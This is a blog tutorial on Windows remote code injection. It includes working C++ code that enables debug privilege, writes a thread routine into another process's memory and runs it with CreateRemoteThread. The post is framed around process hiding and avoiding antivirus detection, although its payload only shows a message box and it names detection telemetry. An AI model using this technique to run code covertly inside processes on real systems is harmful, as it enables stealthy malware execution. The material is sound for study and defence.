Remote code injection
2022-06-12 13:56:00 【HyperCall】
TIPS
1.
When I was working on process hiding I wrote a DLL injection tool: it writes the DLL's name into the target process and then has the target call LoadLibrary to load it. How do you make another program call LoadLibrary? With CreateRemoteThread, which creates a thread inside a remote process. Why would Microsoft provide such a function? It is not an API made for injection; its real job is simply to create a thread in another process. The thread routine it expects has the prototype DWORD WINAPI ThreadProc(LPVOID lparam): one parameter, a pointer to anything. LoadLibrary's prototype is HMODULE WINAPI LoadLibrary(LPCTSTR lpFileName): also one parameter, also a pointer, same WINAPI (stdcall) calling convention. The two are close enough that, as far as the call itself is concerned, LoadLibrary can be handed to CreateRemoteThread as the thread routine without anything going wrong. The new thread then runs LoadLibrary, so starting the thread = loading the DLL, and DllMain runs whatever code we put in it.
2.
In practice this approach is not stealthy enough. Loading a whole DLL into the target is a big, noisy event that is very likely to be detected, and because the DLL exists as a file on disk, cloud-backed AV will flag it quickly. In other words, DLL injection is easy to intercept. Keep in mind too that the remote thread itself is visible no matter what it runs: endpoint telemetry such as Sysmon Event ID 8 records every cross-process CreateRemoteThread with its start address, and for this variant that address resolves straight to LoadLibraryA in kernel32.dll.
3.
Instead we can use CreateRemoteThread for what it was actually designed for: run a ThreadProc of our own directly. The code of that ThreadProc is written into the target with WriteProcessMemory, and the data its lparam points to is written the same way, so the CreateRemoteThread call runs our ThreadProc immediately and nothing touches disk. (The same telemetry then shows a thread starting at an address backed by no loaded module, which is a tell of its own.)
4.
When ThreadProc calls an API, we cannot be sure the target process has loaded the DLL that exports it, so we usually need to call LoadLibrary first (with its address and the DLL name passed in through the parameter block) to load that API's DLL before calling it.
5.
The ThreadProc in Reverse Engineering Core Principles calls LoadLibrary, then GetProcAddress, and only then calls MessageBoxA dynamically. That step felt complicated and unnecessary, so I pass the address of MessageBoxA in directly instead; tested, it works fine. It works because system DLLs such as user32.dll and kernel32.dll are mapped at the same base in every process of the same bitness within a boot session (ASLR randomizes them once at boot, not per process), so the address GetProcAddress returns in the injector is valid in the target too. It stops working across bitness, for example a 32-bit injector targeting a 64-bit process.
6.
The key API calls (VirtualAllocEx and WriteProcessMemory) need the size of the whole ThreadProc function. The trick used for that is address subtraction, written in the code as (DWORD)ThreadProc-(DWORD)Code_Inject: two functions compiled one after the other sit next to each other in the binary, so the address of the function that follows minus the address of the function being measured is that function's size. Mind the direction, though: with ThreadProc placed after Code_Inject, ThreadProc - Code_Inject is the size of Code_Inject, not of ThreadProc. The subtraction must use the function laid out immediately after ThreadProc (in CodeInject.cpp that is EnableDebugPrivilege), and it assumes the compiler keeps source order and the linker is not incremental (incremental linking makes &ThreadProc point at a jump thunk, so the difference is a few bytes of thunk table). If in doubt, step through it in a debugger and compare the result with the function's disassembly.
CodeInject.h

#include "windows.h"
#include <iostream>
using namespace std;

//*******************************Params Definition *****************************************
// Everything the injected thread needs travels in this block: the code is copied
// raw into the target, so it cannot reference the injector's globals, string
// literals or import table by address.
typedef struct _THREAD_PARAM{
    FARPROC pFunc[2];       // [0] LoadLibraryA, [1] MessageBoxA
    char szbuf[2][128];     // [0] "user32.dll", [1] message text
}THREAD_PARAM,*PTHREAD_PARAM;

//*******************************Windows API Definition *****************************************
typedef HMODULE (WINAPI *PFLOADLIBRARY)(LPCSTR lpLibFileName); //LoadLibrary()
typedef int (WINAPI *PFMESSAGEBOXA)(HWND hwnd,LPCSTR lptext,LPCSTR lpcaption,UINT utype); //MessageBoxA()

DWORD WINAPI ThreadProc(LPVOID lparam);  // injected thread routine
BOOL EnableDebugPrivilege();             // enables SeDebugPrivilege in our own token
void Code_Inject();                      // code injection routine

CodeInject.cpp
#include "CodeInject.h"

DWORD Inject_Pid=0;
THREAD_PARAM param={0};

int main(){
    cout<<"plz input pid you want to inject"<<endl;
    cin>>Inject_Pid;
    LoadLibraryA("user32.dll");   // make sure user32.dll is mapped here so GetModuleHandleA below succeeds
    //**************************** Set up Params Parameters *********************************
    HMODULE hmod1=GetModuleHandleA("kernel32.dll");
    HMODULE hmod2=GetModuleHandleA("user32.dll");
    param.pFunc[0]=GetProcAddress(hmod1,"LoadLibraryA"); // lets the thread make sure user32.dll is loaded in the target
    param.pFunc[1]=GetProcAddress(hmod2,"MessageBoxA");  // same address in the target: system DLLs share one base per boot session
    strcpy_s(param.szbuf[0],"user32.dll");               // LoadLibraryA argument
    strcpy_s(param.szbuf[1],"Injected");                 // MessageBoxA argument
    //**************************** Set up Params complete *********************************
    Code_Inject();
    return 0;
}

void Code_Inject(){
    if(!EnableDebugPrivilege()){ // needed for processes owned by another user or running elevated
        cout<<"EnableDebugPrivilege Failed";
        system("pause");
        return;
    }
    HANDLE hprocess=OpenProcess(PROCESS_ALL_ACCESS,FALSE,Inject_Pid); // get process handle
    if(!hprocess){ cout<<"OpenProcess Failed: "<<GetLastError()<<endl; return; }

    // Size of ThreadProc: EnableDebugPrivilege is defined immediately after it in this
    // file, so (address of the next function) - ThreadProc spans exactly ThreadProc's code.
    // Relies on source-order layout; build with /INCREMENTAL:NO, otherwise &ThreadProc is a jump thunk.
    SIZE_T code_size=(DWORD_PTR)EnableDebugPrivilege-(DWORD_PTR)ThreadProc;

    LPVOID param_address=VirtualAllocEx(hprocess,NULL,sizeof(THREAD_PARAM),MEM_COMMIT,PAGE_READWRITE); // room for param
    LPVOID ThreadProc_address=VirtualAllocEx(hprocess,NULL,code_size,MEM_COMMIT,PAGE_READWRITE);      // room for ThreadProc, written RW first
    if(!param_address||!ThreadProc_address){ cout<<"VirtualAllocEx Failed: "<<GetLastError()<<endl; CloseHandle(hprocess); return; }

    WriteProcessMemory(hprocess,param_address,(LPVOID)&param,sizeof(THREAD_PARAM),NULL); // write param
    WriteProcessMemory(hprocess,ThreadProc_address,(LPVOID)ThreadProc,code_size,NULL);   // write ThreadProc

    // Make the code page executable only after writing it: a PAGE_READWRITE page faults under DEP.
    DWORD old_protect=0;
    VirtualProtectEx(hprocess,ThreadProc_address,code_size,PAGE_EXECUTE_READ,&old_protect);

    HANDLE hthread=CreateRemoteThread(hprocess,NULL,0,(LPTHREAD_START_ROUTINE)ThreadProc_address,param_address,0,NULL); // run ThreadProc(param) in the target
    if(hthread){
        WaitForSingleObject(hthread,INFINITE);
        CloseHandle(hthread);
    }else{
        cout<<"CreateRemoteThread Failed: "<<GetLastError()<<endl;
    }
    CloseHandle(hprocess);
}

DWORD WINAPI ThreadProc(LPVOID lparam){
    // Position-independent by construction: touches only what lparam points to and calls
    // through the pointers it carries. No string literals, no direct API calls, no globals.
    PTHREAD_PARAM pParam=(PTHREAD_PARAM)lparam;
    ((PFLOADLIBRARY)pParam->pFunc[0])(pParam->szbuf[0]);                                 //LoadLibraryA("user32.dll")
    ((PFMESSAGEBOXA)pParam->pFunc[1])(NULL,pParam->szbuf[1],pParam->szbuf[1],MB_OK);     //MessageBoxA(NULL,"Injected","Injected",MB_OK)
    return 0;
}

BOOL EnableDebugPrivilege(){
    HANDLE hToken;
    BOOL fOk=FALSE;
    if(OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken)){ // get our token
        TOKEN_PRIVILEGES tp;
        tp.PrivilegeCount=1;
        if(!LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&tp.Privileges[0].Luid)) // get the LUID of SeDebugPrivilege
            cout<<"Can't lookup privilege value"<<endl;
        tp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED; // the key step: set the attribute to SE_PRIVILEGE_ENABLED
        if(!AdjustTokenPrivileges(hToken,FALSE,&tp,sizeof(tp),NULL,NULL)) // adjust the token
            cout<<"Can't adjust privilege value"<<endl;
        fOk=(GetLastError()==ERROR_SUCCESS); // AdjustTokenPrivileges returns TRUE even when nothing was assigned, so check GetLastError
        CloseHandle(hToken);
        hToken=NULL;
    }
    return fOk;
}